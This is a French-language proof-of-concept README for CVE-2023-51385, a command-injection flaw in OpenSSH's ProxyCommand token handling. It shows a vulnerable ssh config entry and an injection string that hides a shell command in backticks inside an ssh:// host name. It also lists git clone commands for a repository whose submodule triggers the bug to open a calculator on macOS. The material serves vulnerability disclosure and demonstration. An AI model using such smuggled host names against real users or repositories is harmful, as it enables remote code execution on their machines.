
CVE-2023-51385
RCE via insecure ~/.ssh/config L'utilisation de jetons tels que %h, %p est assez courante pour utiliser des tunnels et du proxy de connexion via SSH.ProxyCommand
Configuration vulnérable
host *.example.com
ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
Note : lors de mon évaluation initiale, j'avais l'impression que l'utilisation de '%h (guillemets simples) éviterait cela, mais il semble que cela reste vulnérable avec quelque chose comme :
ssh://echo helloworld > cve.txt`foo.example.com/bar
Tiré de : https://man.openbsd.org/ssh_config#ProxyCommand
Ce que contient ce dépôt Un sous-module qui exploiterait cette vulnérabilité pour faire apparaître une calculatrice sur OSX.
Essayez-le en utilisant :
git clone https://github.com/vin01/poc-proxycommand-vulnerable --recurse-submodules
ou
git clone [email protected]:vin01/poc-proxycommand-vulnerable.git --recurse-submodules